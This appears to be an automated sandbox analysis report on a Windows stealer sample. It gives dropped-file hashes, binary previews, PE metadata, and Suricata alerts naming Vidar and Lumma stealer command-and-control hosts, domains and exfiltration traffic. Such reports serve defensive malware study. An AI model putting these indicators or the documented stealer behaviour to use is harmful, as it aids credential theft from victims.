Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`..................................;..S....@...............(..(&...`.......:............................................... ............... ..H............text...D.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B................ <......H..........0...............................................................^.8=..Q..v A.3[R.J.._....f..9.\l..vC#SsnB~.E..~.i..7.}+.V...#..8..f.#XW....b...(..............<O.......1.$.=UN8.)..LL....(K....,r.....%9.L.Y.=0..T4.&.....d....(U....'="...(>.d..+..92...p8.1..Pa\q....]X./a.@0C.PQ...B...v..6....le2....4I3.......P.C:...v.}.Q.wp..S(A.Qg.'..N.._X.mvg...J/J6.^...D^MI.O4.5.+....e...^.DIf?.1$;7..x...M..q.q.{'...I..CN.n...a.P.8....!0..\.^.'...3.._....,\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5dbaca34ac_lfdnsafnds[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	385064
Entropy (8bit):	7.98819744237574
Encrypted:	false
SSDEEP:	6144:bymTbhLAP1TbvdrXIFTjCUBfmfq1VpIe+kUWLD38DEVhyF2tLooTPbJBJaINPK7z:bymTiJVr4FTjCUVsq1we++D3FU2CW7aT
MD5:	47697A60A96C5ADEF362D8DA9A274B7D
SHA1:	16DBC512F121C27E2CB48A61D6DCF166AA792E0D
SHA-256:	63D86693917598DF88D518C057C7680B5BD2DE9ADD384425F81EAD95EEE18DBA
SHA-512:	4F18DB753FBD9F08842630DD2AC97DC6B368269C80DFC8A2F880BAA80010DB013C8168A6C19465F5D843AE135B162A63EB2DC1C48EA93C5B255868C77C591A17
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f............................>.... ........@.. ....................... ............`.....................................S.......................(&........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........0............................................................y.YYl.v^...5f.H$...../.W.a.zz..5O..7...f..S.l\.RB.k.5...Eq.....v......B...f............9v...;(.F. .J.g.i..(....B.B.M.s...<..ub. .l.].....Qg...\.Bc.....$........fVGZ.........8....lH;!..."......p.UO.8.Y"....d..\...dD".sm}.c#.?.4?..Y#.......0....VS..X..\|....G...g.:!rM[~...e.Bp..bz.{....`5......\|..\|b.O....G......A.h...}s8...W.PaG?...U.K%.9].\|.....wc\\|..B..K=.D..u..G.@..q...y0g...5..i.......<

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\76561199780418869[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34725
Entropy (8bit):	5.398732403256842
Encrypted:	false
SSDEEP:	768:udpqme0Ih3tAA6WGA2fcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2S0:ud8me0Ih3tAA6WGA2FhTBv++nIjBtPF9
MD5:	CB12F6F42CF7B33DEB2D70060570ACE7
SHA1:	57CA401FDE4DDD338DC1F816B2DF7F1577488B78
SHA-256:	C4CF334D29300CB803C0C5FBD90562304CBD0298FB6292E16D16B5AA1937666D
SHA-512:	DF0F93651FE30945913DA527D01745759F87A5F2D00EB4F3748E7725025313DD46BB65AB550BC9D3A513E8B0AB6893CD2916B3B33A17AA962CBA9CB62C0D3C25
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://5.75.211.162\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link href

C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Download File

Process:	C:\ProgramData\AFHDGDGIID.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1785344
Entropy (8bit):	6.646511331349125
Encrypted:	false
SSDEEP:	24576:+rKxoVT2iXc+IZP+6WiaTAsN/3ebTvK+63CWH8iA/iD2hgPjcC8SVdKumYr7:vHZGpdqYH8ia6GcKuR7
MD5:	C213162C86BB943BCDF91B3DF381D2F6
SHA1:	8EC200E2D836354A62F16CDB3EED4BB760165425
SHA-256:	AC91B2A2DB1909A2C166E243391846AD8D9EDE2C6FCFD33B60ACF599E48F9AFC
SHA-512:	B3EAD28BB1F4B87B0C36C129864A8AF34FC11E5E9FEAA047D4CA0525BEC379D07C8EFEE259EDE8832B65B3C03EF4396C9202989249199F7037D56439187F147B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...#.CZ.................4..........<7.......P....@..............................................@...................................`...{.......................^...................................................................................text... ........................... ..`.itext..\|....0... .................. ..`.data...x....P.......8..............@....bss.....O...p.......L...................idata...............L..............@....tls.................`...................rdata...............`..............@..@.reloc...^.......`...b..............@..B.rsrc....{...`...\|..................@..@.............p......................@..@................................................................................................

C:\Users\user\AppData\Local\Temp\delays.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	modified
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:UiiJ:7iJ
MD5:	6A2B87E137DC5B44FD19F7CE501C41B5
SHA1:	CE31560D426B78BD969EF6080F2B65743CB5807E
SHA-256:	76CE63F18F7A9ADBBDF14B4B34933EEE006AA1B67DAAE3AFBB7C2C70FB9D6E3E
SHA-512:	74379A05EAA9DA82BAF70A6465445F0838DC024F6E56E04120316A2FCDC3CF9FFB85F770586F9D3631783C00D013FA7CE04CF56772C954F5FBF4BFC52829B60D
Malicious:	false
Preview:	GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG

C:\Windows\System32\rfxvmt.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37376
Entropy (8bit):	5.7181012847214445
Encrypted:	false
SSDEEP:	768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
MD5:	E3E4492E2C871F65B5CEA8F1A14164E2
SHA1:	81D4AD81A92177C2116C5589609A9A08A5CCD0F2
SHA-256:	32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
SHA-512:	59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............\|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\netsh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	7
Entropy (8bit):	2.2359263506290326
Encrypted:	false
SSDEEP:	3:t:t
MD5:	F1CA165C0DA831C9A17D08C4DECBD114
SHA1:	D750F8260312A40968458169B496C40DACC751CA
SHA-256:	ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
SHA-512:	052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
Malicious:	false
Preview:	Ok.....

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.989371105778008
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	413'224 bytes
MD5:	f73186df5a030cf7f186b0737c3af1f7
SHA1:	d15e45feefbbc010db92ae897d80bc7419c0d046
SHA256:	05c67a9765fe1ebebcedaee376f87a803d7cd37e6c5c19f7d336c2f14a4ef207
SHA512:	a6e4d6e34748fa8fb9153e2104cf49cc36af9b22e29c8df050de0db4e14e9dd18ed178b4bbacd6289a0a55b465c996fb931799ba970dfe559c85215db7e31df1
SSDEEP:	12288:WFVCXJfc+aP2LQB0g7YUsKEJGxhimXJEO:MCX2d+LQqbKEJQim5t
TLSH:	CE94238986C98391EC7CBC347516D75621F1B7E5EC131E89B06A70F9E8CD3A025B43AE
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x463c3e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F5DAED [Thu Sep 26 22:06:37 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 00:00:00 16/01/2026 23:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x63be8	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0x5c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x62800	0x2628
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x66000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x63ab0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x61c44	0x61e00	fcfe34140c87b93a1c1b25751c264e85	False	0.9938138569604087	data	7.9958244524809645	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x64000	0x5c8	0x600	db1daa9db276719b7dce2f7fee59adb7	False	0.4361979166666667	data	4.115782972549961	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x66000	0xc	0x200	668ddc03321cdfb17f8be719cbc539e8	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x640a0	0x334	data			0.4426829268292683
RT_MANIFEST	0x643d8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-27T00:14:28.857369+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49740	5.75.211.162	443	TCP
2024-09-27T00:14:30.047301+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49741	5.75.211.162	443	TCP
2024-09-27T00:14:31.424414+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49742	5.75.211.162	443	TCP
2024-09-27T00:14:32.132983+0200	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.4	49742	5.75.211.162	443	TCP
2024-09-27T00:14:32.792950+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49743	5.75.211.162	443	TCP
2024-09-27T00:14:33.488655+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	5.75.211.162	443	192.168.2.4	49743	TCP
2024-09-27T00:14:34.149527+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49744	5.75.211.162	443	TCP
2024-09-27T00:14:34.838625+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	5.75.211.162	443	192.168.2.4	49744	TCP
2024-09-27T00:14:35.562421+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49745	5.75.211.162	443	TCP
2024-09-27T00:14:36.581589+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49746	5.75.211.162	443	TCP
2024-09-27T00:14:39.706116+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49747	5.75.211.162	443	TCP
2024-09-27T00:14:40.918817+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49748	5.75.211.162	443	TCP
2024-09-27T00:14:41.930442+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49749	5.75.211.162	443	TCP
2024-09-27T00:14:43.074730+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49750	5.75.211.162	443	TCP
2024-09-27T00:14:44.107022+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49751	5.75.211.162	443	TCP
2024-09-27T00:14:45.825014+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49752	5.75.211.162	443	TCP
2024-09-27T00:14:47.539254+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49753	5.75.211.162	443	TCP
2024-09-27T00:14:49.077562+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49754	5.75.211.162	443	TCP
2024-09-27T00:14:50.619616+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49755	5.75.211.162	443	TCP
2024-09-27T00:14:52.789705+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49756	5.75.211.162	443	TCP
2024-09-27T00:14:55.766830+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49757	5.75.211.162	443	TCP
2024-09-27T00:14:56.945373+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49758	5.75.211.162	443	TCP
2024-09-27T00:14:58.287500+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49759	5.75.211.162	443	TCP
2024-09-27T00:14:59.736675+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49760	5.75.211.162	443	TCP
2024-09-27T00:15:01.765713+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49762	5.75.211.162	443	TCP
2024-09-27T00:15:03.802303+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49763	5.75.211.162	443	TCP
2024-09-27T00:15:06.278834+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49764	147.45.44.104	80	TCP
2024-09-27T00:15:07.166816+0200	2056176	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wallkedsleeoi .shop)	1	192.168.2.4	52568	1.1.1.1	53	UDP
2024-09-27T00:15:07.669123+0200	2056177	ET MALWARE Observed Win32/Lumma Stealer Related Domain (wallkedsleeoi .shop in TLS SNI)	1	192.168.2.4	49766	104.21.36.139	443	TCP
2024-09-27T00:15:07.750779+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49765	5.75.211.162	443	TCP
2024-09-27T00:15:08.133125+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49766	104.21.36.139	443	TCP
2024-09-27T00:15:08.133125+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49766	104.21.36.139	443	TCP
2024-09-27T00:15:08.163096+0200	2056164	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)	1	192.168.2.4	51877	1.1.1.1	53	UDP
2024-09-27T00:15:08.654623+0200	2056165	ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)	1	192.168.2.4	49767	104.21.4.136	443	TCP
2024-09-27T00:15:08.898249+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49764	147.45.44.104	80	TCP
2024-09-27T00:15:09.096642+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49767	104.21.4.136	443	TCP
2024-09-27T00:15:09.096642+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49767	104.21.4.136	443	TCP
2024-09-27T00:15:09.100767+0200	2056162	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)	1	192.168.2.4	62977	1.1.1.1	53	UDP
2024-09-27T00:15:09.585800+0200	2056163	ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)	1	192.168.2.4	49768	188.114.97.3	443	TCP
2024-09-27T00:15:09.941873+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49769	5.75.211.162	443	TCP
2024-09-27T00:15:10.034198+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49768	188.114.97.3	443	TCP
2024-09-27T00:15:10.034198+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49768	188.114.97.3	443	TCP
2024-09-27T00:15:10.038406+0200	2056160	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)	1	192.168.2.4	56240	1.1.1.1	53	UDP
2024-09-27T00:15:10.771432+0200	2056161	ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)	1	192.168.2.4	49770	188.114.96.3	443	TCP
2024-09-27T00:15:11.279313+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49764	147.45.44.104	80	TCP
2024-09-27T00:15:11.283870+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49770	188.114.96.3	443	TCP
2024-09-27T00:15:11.283870+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49770	188.114.96.3	443	TCP
2024-09-27T00:15:11.287488+0200	2056158	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)	1	192.168.2.4	49981	1.1.1.1	53	UDP
2024-09-27T00:15:11.885423+0200	2056159	ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)	1	192.168.2.4	49771	188.114.97.3	443	TCP
2024-09-27T00:15:12.068341+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49772	5.75.211.162	443	TCP
2024-09-27T00:15:12.490926+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49771	188.114.97.3	443	TCP
2024-09-27T00:15:12.490926+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49771	188.114.97.3	443	TCP
2024-09-27T00:15:12.494857+0200	2056156	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)	1	192.168.2.4	64698	1.1.1.1	53	UDP
2024-09-27T00:15:12.983938+0200	2056157	ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)	1	192.168.2.4	49773	172.67.162.108	443	TCP
2024-09-27T00:15:13.438318+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49773	172.67.162.108	443	TCP
2024-09-27T00:15:13.438318+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49773	172.67.162.108	443	TCP
2024-09-27T00:15:13.448159+0200	2056154	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)	1	192.168.2.4	63460	1.1.1.1	53	UDP
2024-09-27T00:15:13.690540+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49775	5.75.211.162	443	TCP
2024-09-27T00:15:13.935923+0200	2056155	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)	1	192.168.2.4	49776	188.114.96.3	443	TCP
2024-09-27T00:15:14.346648+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49776	188.114.96.3	443	TCP
2024-09-27T00:15:14.346648+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49776	188.114.96.3	443	TCP
2024-09-27T00:15:14.396934+0200	2056152	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)	1	192.168.2.4	51859	1.1.1.1	53	UDP
2024-09-27T00:15:14.911440+0200	2056153	ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)	1	192.168.2.4	49777	188.114.97.3	443	TCP
2024-09-27T00:15:16.084795+0200	2054495	ET MALWARE Vidar Stealer Form Exfil	1	192.168.2.4	49778	45.132.206.251	80	TCP
2024-09-27T00:15:16.089236+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49777	188.114.97.3	443	TCP
2024-09-27T00:15:16.089236+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49777	188.114.97.3	443	TCP
2024-09-27T00:15:16.207474+0200	2056150	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)	1	192.168.2.4	65108	1.1.1.1	53	UDP
2024-09-27T00:15:16.707368+0200	2056151	ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)	1	192.168.2.4	49779	172.67.208.139	443	TCP
